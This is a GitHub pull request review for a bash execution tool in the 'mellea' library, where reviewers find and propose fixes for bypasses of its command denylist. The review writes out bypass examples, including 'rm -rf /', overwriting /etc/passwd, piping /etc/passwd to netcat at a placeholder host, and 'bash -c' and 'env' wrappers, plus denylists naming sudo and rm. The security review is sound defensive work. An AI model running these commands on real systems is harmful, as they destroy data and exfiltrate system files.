feat: add bash tool #1056
The PR description has been updated. Please fill out the template for your PR to be reviewed.
planetf1 left a comment
Thanks for the PR — the three-tier environment design (Static/Unsafe/LLMSandbox) follows code_interpreter cleanly, and reusing ExecutionResult is the right call.
Two security concerns need resolving before merge, plus a few smaller issues below.
UnsafeBashEnvironment validates argv but executes with shell=True
The safety checks parse the command with shlex.split() and inspect argv[0], then execute the original string with subprocess.run(command, shell=True, ...) (line 430). The shell processes the raw string, not the tokenised argv, so shell metacharacters bypass every check:
local_bash_executor("echo hi; rm -rf /")
# shlex.split → ['echo', 'hi;', 'rm', '-rf', '/']
# argv[0] = 'echo', so every check passes
# shell runs: echo hi; rm -rf /  ← both commands execute
Same with redirects, pipes, and subshell substitution:
local_bash_executor("echo foo > /etc/passwd") # redirect, not a write_command
local_bash_executor("echo $(id)") # subshell, not in argv
local_bash_executor("cat /etc/passwd | nc x.x.x.x 4444")  # exfil
The fix is to execute argv with shell=False. That way what you check is exactly what runs.
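A minimal sketch of the shell=False approach. `run_checked()` and the `DENYLIST` set are hypothetical stand-ins for the real checks in shell.py; the point is that the tokenised argv that gets validated is the same argv that gets executed, so no shell ever re-parses the input.

```python
import os
import shlex
import subprocess

# Hypothetical denylist for illustration; not the list in shell.py.
DENYLIST = {"sudo", "su", "rm", "dd", "mkfs"}


def run_checked(command: str, timeout: float = 30.0) -> subprocess.CompletedProcess:
    """Tokenise once, validate the tokens, then execute exactly those tokens."""
    argv = shlex.split(command)
    if not argv:
        raise ValueError("empty command")
    # basename() so "/usr/bin/sudo" is caught as well as "sudo".
    if os.path.basename(argv[0]) in DENYLIST:
        raise PermissionError(f"command not allowed: {argv[0]}")
    # Passing a list with shell=False means no shell re-parses the input, so
    # ';', '>', '|' and '$(...)' arrive as literal arguments, not operators.
    return subprocess.run(
        argv, shell=False, capture_output=True, text=True, timeout=timeout
    )
```

With this, run_checked("echo hi; rm -rf /") just prints "hi; rm -rf /", because echo receives 'hi;', 'rm', '-rf' and '/' as plain arguments. The trade-off is that commands which genuinely need pipes or redirects no longer work as a single string.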
bash -c "..." isn't blocked
bash, sh, zsh etc. are in DANGEROUS_COMMANDS but only blocked when -i/--interactive/-l/-login appears. bash -c "sudo rm -rf /" passes:
shlex.split('bash -c "sudo rm -rf /"') → ['bash', '-c', 'sudo rm -rf /']
any(arg in ('-i', '--interactive', '-l', '-login') for arg in argv)  # → False
Any LLM-generated command can dodge the whole denylist with a bash -c "..." wrapper. test_safe_shell_commands_allowed intentionally locks this in as expected behaviour, so it would need updating too.
If you go the shell=False route above, you'd also want to block -c (and script-file arguments) on shell interpreters.
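One way to block -c and script-file arguments, sketched under assumptions: `shell_interpreter_violation()` and `SHELL_INTERPRETERS` are hypothetical names, and argv is assumed to be the already tokenised command that will run with shell=False. Bundled short options such as -ec are caught, and the first non-option argument is treated as a script file.

```python
import os
from typing import List, Optional

# Hypothetical set of interpreters that can run arbitrary code from a string or file.
SHELL_INTERPRETERS = {"bash", "sh", "zsh", "dash", "ksh", "fish"}


def shell_interpreter_violation(argv: List[str]) -> Optional[str]:
    """Return a reason if argv runs a shell with -c or a script file, else None."""
    if not argv or os.path.basename(argv[0]) not in SHELL_INTERPRETERS:
        return None
    for arg in argv[1:]:
        if arg == "--":
            # Anything after "--" is a script path or its arguments.
            return "shell interpreter with script argument"
        if arg.startswith("--"):
            continue  # long options such as --norc are not command strings
        if arg.startswith("-"):
            # Short options can be bundled, e.g. "-ec" or "-xc".
            if "c" in arg[1:]:
                return "shell interpreter with -c"
            continue
        # First non-option argument: treat it as a script file (conservative).
        return "shell interpreter with script argument"
    return None
```

This is deliberately conservative: bash -o errexit is also rejected, because errexit is read as a script name. It only inspects argv[0], so an env bash -c prefix still needs separate handling.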
Other things worth fixing in the same pass:
BashEnvironment.__init__ accepts allowed_paths and stores it on self, but nothing in any of the three environment classes reads self.allowed_paths. Callers who pass it expecting path enforcement get nothing. Either wire it into the checks or drop the parameter.
LLMSandboxBashEnvironment validates working_dir statically but doesn't pass it to SandboxSession (line 552 — no working_dir arg). The Docker container runs with its own default cwd. bash_executor(cmd, working_dir="/project") silently ignores the restriction.
except subprocess.TimeoutExpired at line 569 is inside the llm-sandbox session block. llm-sandbox isn't subprocess, so this handler likely never fires — timeouts fall through to except Exception with a generic message. The interpreter.py pattern just uses except Exception as e and that's cleaner here.
The parse/validate preamble (shlex.split → empty check → three validator calls) is copy-pasted into all three execute() methods verbatim. Once the security issues are fixed, extracting it to BashEnvironment._validate() would make future changes a one-place edit.
docs/examples/tools/shell_example.py line 1: # pytest: unit, qualitative → should be # pytest: e2e, qualitative. unit is auto-applied by conftest and shouldn't be written explicitly; this example runs real subprocesses so e2e is the right tier.
Three unused imports in shell.py: tempfile, dataclass, Any — ruff will flag these as F401.
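A sketch combining two of the points above: a shared `_validate()` preamble and an `allowed_paths` check that is actually enforced. The class shape, the `Validator` type and `path_is_allowed()` are hypothetical, not the signatures in shell.py. The path check is fail-closed: a path that cannot be resolved is denied rather than allowed.

```python
import shlex
from pathlib import Path
from typing import Callable, Iterable, List, Optional

# Hypothetical validator type: return a rejection reason, or None to accept argv.
Validator = Callable[[List[str]], Optional[str]]


def path_is_allowed(path: str, allowed_paths: Iterable[str]) -> bool:
    """Fail-closed: True only if `path` resolves to an allowed root or below it."""
    try:
        target = Path(path).resolve(strict=True)  # raises if the path doesn't exist
    except (OSError, RuntimeError):
        return False
    for root in allowed_paths:
        try:
            base = Path(root).resolve(strict=True)
        except (OSError, RuntimeError):
            continue  # a misconfigured root never widens access
        if target == base or base in target.parents:
            return True
    return False


class BashEnvironment:
    """Illustrative base class; names and signatures are assumptions."""

    def __init__(self, validators: List[Validator], allowed_paths: Optional[List[str]] = None):
        self.validators = validators
        self.allowed_paths = allowed_paths

    def _validate(self, command: str, working_dir: Optional[str] = None) -> List[str]:
        """Shared preamble for every execute(): tokenise, reject empty, run checks."""
        argv = shlex.split(command)
        if not argv:
            raise ValueError("empty command")
        for check in self.validators:
            reason = check(argv)
            if reason is not None:
                raise PermissionError(reason)
        if self.allowed_paths is not None and working_dir is not None:
            if not path_is_allowed(working_dir, self.allowed_paths):
                raise PermissionError(f"working_dir not allowed: {working_dir}")
        return argv
```

Each environment's execute() would then start with argv = self._validate(command, working_dir), so a fix to the checks lands in one place. Note that strict resolution denies paths that do not exist yet; allowing a new file would mean resolving its parent directory instead.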
The Docker sandbox path (… The checks (lines 91–124) parse the command with … The Python docs cover this in the subprocess security considerations: pre-processing a string before passing it to a shell does not make it safe. The shell is the parser that matters. Two ways to fix this. Drop …
What direction do you plan to take? Unsafe bash execution feels inherently risky (though many tools do offer something similar). I wonder whether it should be disabled by default, and we need to be very clear about any limitations and security impact.
Checking this against #1024: the capability-UX integration (allow once / allow always, policy wiring through the harness) doesn't appear to be included. Intentional scope reduction, or planned as a follow-up?
ajbozarth left a comment
Some feedback from Claude. Also note Nigel's follow-up comment on UnsafeBashEnvironment still stands.
Signed-off-by: Akihiko Kuroda <akihikokuroda2020@gmail.com>
I'll address it as a follow-up.
ajbozarth left a comment
All major concerns from the prior round are addressed. A few non-blocking follow-ups inline.
LGTM from my side once Angelo's inline comments are addressed. Thanks for filing the follow-up issues too.
Updates look good, but I still don't get a successful result in the LLM example: … For comparison, before the last commit this was the result: …
Here is my case: the LLM generates a command with "find". It doesn't find any files anyway, but it doesn't report an "error" either. :-)
ajbozarth left a comment
FYI the example failed for me until I set DOCKER_HOST. The Python docker SDK (used by llm-sandbox) doesn't read Docker CLI contexts and defaults to /var/run/docker.sock. That works on Docker Desktop (which symlinks the socket there) but not on colima, podman, or rootless setups, where users hit a cryptic FileNotFoundError(2, 'No such file or directory') with no pointer to the real fix.
Not blocking, but might be worth a note in the example docstring or a clearer skip-reason.
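A sketch of what a clearer skip reason could look like. `docker_skip_reason()` is a hypothetical helper; it relies only on the fact that the Docker SDK honours DOCKER_HOST and otherwise defaults to /var/run/docker.sock. It checks that the socket file exists, not that the engine is actually reachable.

```python
import os
from typing import Optional

DEFAULT_SOCKET = "/var/run/docker.sock"


def docker_skip_reason() -> Optional[str]:
    """Return a human-readable skip reason if Docker looks unconfigured, else None."""
    if os.environ.get("DOCKER_HOST"):
        return None  # the Docker SDK reads DOCKER_HOST, so trust it
    if os.path.exists(DEFAULT_SOCKET):
        return None
    return (
        f"DOCKER_HOST is not set and {DEFAULT_SOCKET} does not exist. The Python "
        "docker SDK does not read Docker CLI contexts; on colima, podman or rootless "
        "Docker, export DOCKER_HOST to point at your engine's socket."
    )
```

The example could call pytest.skip(reason) when this returns a string, instead of surfacing the bare FileNotFoundError.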
@ajbozarth Commenting on Docker setup seems out of scope for this example.
@planetf1 Would you approve this?
planetf1 left a comment
Thanks for the PR, Aki! The shlex.split/shell=False foundation is the right approach, and the environment abstraction is clean. I do have three security findings that need addressing before merge, plus a few correctness issues.
BLOCKERs (must fix before merge)
- env-chain bypass: env -i sudo whoami and env rm -rf /tmp/test both pass through the denylist
- _check_working_dir_restriction is fail-open: an unresolvable working_dir silently grants access to all paths
- /private/var in DANGEROUS_PATHS blocks Python's standard temp directories on macOS
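A sketch of one possible fix for the env-chain bypass: unwrap any leading env invocation before the denylist runs, so the checks see sudo or rm rather than env. `unwrap_env()` is hypothetical, and the option handling covers common GNU env flags only; it is not an exhaustive parser.

```python
import os
from typing import List

# GNU env options that consume the following token as their value.
_ENV_OPTS_WITH_VALUE = {"-u", "--unset", "-C", "--chdir"}


def unwrap_env(argv: List[str]) -> List[str]:
    """Strip leading `env [options] [NAME=value ...]` so checks see the real command."""
    while argv and os.path.basename(argv[0]) == "env":
        i = 1
        while i < len(argv):
            arg = argv[i]
            # -S / --split-string re-splits a string into a new command line,
            # so refuse it rather than parse it (conservative: any short
            # option group containing "S" is refused).
            if arg.startswith("--split-string") or (
                arg.startswith("-") and not arg.startswith("--") and "S" in arg
            ):
                raise PermissionError("env -S is not allowed")
            if arg == "--":
                i += 1
                break
            if arg in _ENV_OPTS_WITH_VALUE:
                i += 2  # skip the option and its value
            elif arg.startswith("-") or "=" in arg:
                i += 1  # a flag such as -i, or a NAME=value assignment
            else:
                break  # first token of the wrapped command
        argv = argv[i:]
    return argv
```

The returned argv would then go through the existing checks; an empty result (a bare env) should be rejected like any empty command. Other command-running wrappers such as nohup or timeout raise the same question.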
Warnings
- Shell operator substring check produces false positives (grep a&&b file.txt is blocked)
- Several normal operations are incorrectly blocked: git config -f, git clean --dry-run, cp -r, make -f
- Double truncation marker in _LocalBashEnvironment.execute()
- repr() in the sandbox Python wrapper breaks if any argv element is a Path object
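The repr() issue goes away if every argv element is coerced to str and embedded as JSON. A minimal sketch, assuming the sandbox runs a generated Python script; `build_sandbox_wrapper()` is hypothetical, and how the script is handed to llm-sandbox is not shown. Passing cwd= to subprocess.run inside the container is also one possible way to honour working_dir without relying on a SandboxSession argument.

```python
import json
from pathlib import Path
from typing import Optional, Sequence, Union


def build_sandbox_wrapper(
    argv: Sequence[Union[str, Path]],
    working_dir: Optional[Union[str, Path]] = None,
    timeout: int = 30,
) -> str:
    """Generate Python source that runs argv inside the sandbox with shell=False."""
    # str() first so Path objects become plain strings, then JSON-encode.
    # repr() of a PosixPath would emit "PosixPath('...')", undefined in the sandbox.
    argv_json = json.dumps([str(a) for a in argv])
    cwd_json = json.dumps(None if working_dir is None else str(working_dir))
    return "\n".join([
        "import json, subprocess, sys",
        f"argv = json.loads({argv_json!r})",
        f"cwd = json.loads({cwd_json!r})",
        f"r = subprocess.run(argv, cwd=cwd, capture_output=True, text=True, timeout={int(timeout)})",
        "sys.stdout.write(r.stdout)",
        "sys.stderr.write(r.stderr)",
        "sys.exit(r.returncode)",
    ])
```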
Suggestion
- Truncation test oracle is always true and doesn't actually validate truncation
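A sketch of truncation that adds its marker exactly once, paired with a test whose assertions can actually fail. `truncate_output()`, `MAX_OUTPUT_CHARS` and `TRUNCATION_MARKER` are hypothetical; the real limit and marker text in shell.py may differ.

```python
# Hypothetical limit and marker; the real values in shell.py may differ.
MAX_OUTPUT_CHARS = 100
TRUNCATION_MARKER = "\n... [output truncated]"


def truncate_output(text: str, limit: int = MAX_OUTPUT_CHARS) -> str:
    """Cap text at `limit` characters (marker included), adding the marker once.

    Assumes limit > len(TRUNCATION_MARKER).
    """
    if len(text) <= limit:
        return text  # short enough: no marker, so re-truncating is a no-op
    return text[: limit - len(TRUNCATION_MARKER)] + TRUNCATION_MARKER


def test_truncation() -> None:
    out = truncate_output("x" * 500)
    # Each assertion can fail, unlike an oracle that is always true.
    assert len(out) == MAX_OUTPUT_CHARS
    assert out.endswith(TRUNCATION_MARKER)
    assert out.count("[output truncated]") == 1
    assert truncate_output(out) == out  # truncating twice adds no second marker
    assert truncate_output("short") == "short"
```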
Details in the inline comments.
ajbozarth left a comment
Did a quick re-review after you addressed Nigel's review, and my approval still stands.
Tool PR
Use this template when adding or modifying components in mellea/stdlib/tools/.
Description
This PR adds a bash tool with a fixed configuration. The UX configuration will come in a separate PR.
Implementation Checklist
Protocol Compliance
convert_function_to_tool works
Integration
mellea/stdlib/tools/__init__.py or, if you are adding a library of components, from your sub-module
Testing
tests/stdlib/tools/
Attribution